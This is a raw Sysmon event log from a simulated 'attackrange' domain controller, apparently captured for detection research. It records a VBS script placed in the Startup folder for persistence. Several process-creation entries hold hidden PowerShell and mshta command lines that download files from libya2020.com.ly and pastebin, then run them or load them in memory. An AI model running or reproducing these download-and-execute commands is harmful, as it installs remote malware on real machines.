10341000x8000000000000000106891Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.125{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B4B4-615A-4002-00000000FC01}2236C:\Windows\system32\PING.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106890Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.125{58E9C193-AE62-615A-B200-00000000FC01}32126164C:\Windows\system32\csrss.exe{58E9C193-B4B4-615A-3F02-00000000FC01}108C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106889Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.125{58E9C193-B4B4-615A-3902-00000000FC01}66807188C:\Windows\System32\cmd.exe{58E9C193-B4B4-615A-4002-00000000FC01}2236C:\Windows\system32\PING.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\cmd.exe+f1e1|C:\Windows\System32\cmd.exe+11a37|C:\Windows\System32\cmd.exe+cb0d|C:\Windows\System32\cmd.exe+c295|C:\Windows\System32\cmd.exe+8564|C:\Windows\System32\cmd.exe+c347|C:\Windows\System32\cmd.exe+f916|C:\Windows\System32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106888Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.125{58E9C193-B4B4-615A-3802-00000000FC01}64567528C:\Windows\System32\WScript.exe{58E9C193-B4B4-615A-3F02-00000000FC01}108C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\SHELL32.dll+3ccff|C:\Windows\System32\SHELL32.dll+3cb8c|C:\Windows\System32\SHELL32.dll+dcb2e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106887Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.123{58E9C193-B4B4-615A-4002-00000000FC01}2236C:\Windows\System32\PING.EXE10.0.14393.0 (rs1_release.160715-1616)TCP/IP Ping CommandMicrosoft® Windows® Operating SystemMicrosoft Corporationping.exeping 127.0.0.1 -n 10 C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=7B647B55695ACE1E99158F79AB3AF51A,SHA256=ED7FA5B3CCBDD31A9E83F7C59F78AB5E2C83C7FEEDCC5F8B95948D11EBD7FF34,IMPHASH=5AAE2D3679223F82E19660D380B78FB5{58E9C193-B4B4-615A-3902-00000000FC01}6680C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/rQL02r6C').replace('#$$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close) 154100x8000000000000000106886Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.123{58E9C193-B4B4-615A-3F02-00000000FC01}108C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/H2JdYYVV').replace('#$$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close)C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{58E9C193-B4B4-615A-3802-00000000FC01}6456C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\_______ _____ ___ ______ ______.vbs" 10341000x8000000000000000106885Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.108{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106884Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.108{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106883Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.108{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106882Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.108{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106881Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.108{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B4B4-615A-3D02-00000000FC01}7540C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106880Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.108{58E9C193-B4B4-615A-3802-00000000FC01}64565072C:\Windows\System32\WScript.exe{58E9C193-B4B4-615A-3D02-00000000FC01}7540C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\SHELL32.dll+3ccff|C:\Windows\System32\SHELL32.dll+3cb8c|C:\Windows\System32\SHELL32.dll+dcb2e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106879Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.117{58E9C193-B4B4-615A-3D02-00000000FC01}7540C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://libya2020.com.ly/TR.mp3','C:\Users\ADMINI~1\AppData\Local\Temp\nono.vbs');Start-Process 'C:\Users\ADMINI~1\AppData\Local\Temp\nono.vbs'C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{58E9C193-B4B4-615A-3802-00000000FC01}6456C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\_______ _____ ___ ______ ______.vbs" 10341000x8000000000000000106878Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.108{58E9C193-AE62-615A-B200-00000000FC01}32126164C:\Windows\system32\csrss.exe{58E9C193-B4B4-615A-3C02-00000000FC01}6864C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106877Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.108{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106876Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.108{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B4B4-615A-3B02-00000000FC01}5176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106875Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.108{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106874Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.108{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106873Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.108{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106872Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.108{58E9C193-B4B4-615A-3802-00000000FC01}64567096C:\Windows\System32\WScript.exe{58E9C193-B4B4-615A-3B02-00000000FC01}5176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\SHELL32.dll+3ccff|C:\Windows\System32\SHELL32.dll+3cb8c|C:\Windows\System32\SHELL32.dll+dcb2e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106871Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.110{58E9C193-B4B4-615A-3B02-00000000FC01}5176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://libya2020.com.ly/google01.mp3','C:\Users\ADMINI~1\AppData\Local\Temp\lovefhdfhdf.vbs');Start-Process 'C:\Users\ADMINI~1\AppData\Local\Temp\lovefhdfhdf.vbs'C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{58E9C193-B4B4-615A-3802-00000000FC01}6456C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\_______ _____ ___ ______ ______.vbs" 10341000x8000000000000000106870Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.092{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B4B4-615A-3A02-00000000FC01}7200C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106869Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.092{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B4B4-615A-3A02-00000000FC01}7200C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x8000000000000000106868Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.localT10232021-10-04 08:00:52.092{58E9C193-B4B4-615A-3802-00000000FC01}6456C:\Windows\System32\WScript.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_______ _____ ___ ______ ______.vbs2021-10-04 07:44:22.066 23542300x8000000000000000106867Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.092{58E9C193-B4B4-615A-3802-00000000FC01}6456ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_______ _____ ___ ______ ______.vbsMD5=BBC2230817ED231DD2FE77849DEA54FB,SHA256=1BA98ACA3C82A11DADD3F685BBC7517710581BAA588556989CCF827399762F7E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106866Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.092{58E9C193-B4B4-615A-3A02-00000000FC01}72004720C:\Windows\system32\conhost.exe{58E9C193-B4B4-615A-3902-00000000FC01}6680C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106865Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.077{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B4B4-615A-3A02-00000000FC01}7200C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106864Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.077{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106863Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.077{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106862Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.077{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B4B4-615A-3902-00000000FC01}6680C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106861Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.077{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106860Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 